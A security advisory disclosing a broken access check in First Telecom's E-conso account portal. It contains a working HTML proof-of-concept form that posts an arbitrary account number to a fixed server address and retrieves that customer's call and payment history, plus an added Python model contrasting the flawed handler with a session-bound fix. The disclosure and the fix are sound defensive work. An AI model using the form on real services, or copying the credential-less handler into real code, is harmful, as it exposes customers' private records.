COMMAND

    E-conso

SYSTEMS AFFECTED

    First Telecom E-conso

PROBLEM

    Thomas Quinot found the following.  First Telecom, a company that
    provides a pre-paid calling card service in France, Germany and
    the United Kingdom, offers a service called E-conso which allows
    subscribers to check the current balance of their account and
    peruse the history of all calls they made through First Telecom.

    The WWW form  at the home  page of the  service requires entry  of
    the  account  number  (which  is  printed  on  all  First  Telecom
    documents  and  embossed  on  the  plastic membership card sent to
    every subscriber), as  well as a  password chosen by  the customer
    during the sign-up procedure.

    The submission of this form returns a page which includes the
    customer's name and address, and a form (with a /fixed/ "action"
    URL) which contains the customer's account number as a "hidden"
    field.  Submission of this form returns the details of payments
    or the call history, depending on which button is clicked by the
    customer.  No hidden field and no cookie is used to pass any
    client credentials back to the server, which means it is trivial
    to retrieve the details of past payments as well as the call
    history of a First Telecom customer knowing only her (non-secret)
    account number.

    The HTML code included demonstrates this important flaw:

    <html>

    <head>
    <title>First Telecom e-conso exploit</title>
    </head>

    <body>
    <!-- The "action" URL is fixed and the request carries only the
         account number: no password, session cookie or other
         credential is sent with it. -->
    <form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST">
     <p>
    Account number: <input type="text" name="cmaster" value="0000000">
    <input type="submit" name="cmdcdr" value="Details of calls">
    <input type="submit" name="cmdpaymenthistory" value="Details of payements">
     </p>
    </form>
    </body>
    </html>
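    The following Python model is an added example and is not First
    Telecom's code.  It reproduces the server-side pattern described
    above (a handler that selects the customer record from the
    client-supplied "cmaster" field alone) beside a hardened handler
    that takes the account from a server-side session created at the
    password-checked login.  Requests are plain dicts rather than real
    HTTP, and the account numbers, names, call lists and session ids
    are constructed sample data.

```python
# Added example, not First Telecom's code.  Models the E-conso history
# endpoint as two handlers: the reported (vulnerable) behaviour and a
# fixed version.  Requests are dicts with "form" and optional "cookies".

# Constructed sample back-end data: account number -> customer record.
ACCOUNTS = {
    "0000001": {"name": "Alice Example", "calls": ["+33 1 00 00 00 01"]},
    "0000002": {"name": "Bob Example", "calls": ["+44 20 0000 0002"]},
}

# Constructed session store: session id -> account authenticated at login
# (the first form, where account number *and* password were checked).
SESSIONS = {
    "sess-alice": "0000001",
}


def vulnerable_history(request):
    """Reported behaviour: the second form carries only the account number,
    so the server serves whatever account the client names.  No credential
    is required at all."""
    account = request["form"].get("cmaster")
    record = ACCOUNTS.get(account)
    if record is None:
        return {"status": 404}
    return {"status": 200, "calls": record["calls"]}


def fixed_history(request):
    """Hardened handler: the account is taken from the server-side session
    established at login, never from the request body.  A client-supplied
    'cmaster' that disagrees with the session is rejected rather than used,
    so it cannot select another customer's records."""
    session_id = request.get("cookies", {}).get("session")
    account = SESSIONS.get(session_id)
    if account is None:
        return {"status": 401}        # not logged in
    claimed = request["form"].get("cmaster")
    if claimed is not None and claimed != account:
        return {"status": 403}        # session does not own that account
    return {"status": 200, "calls": ACCOUNTS[account]["calls"]}


if __name__ == "__main__":
    anon = {"form": {"cmaster": "0000002", "cmdcdr": "Details of calls"}}
    print("vulnerable:", vulnerable_history(anon))   # serves Bob's calls
    print("fixed:     ", fixed_history(anon))        # 401
```

    The fix is the credential binding the advisory says is missing:
    the handler never trusts the account number in the request to
    decide whose data to return, only the authenticated session.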

SOLUTION

    Nothing yet.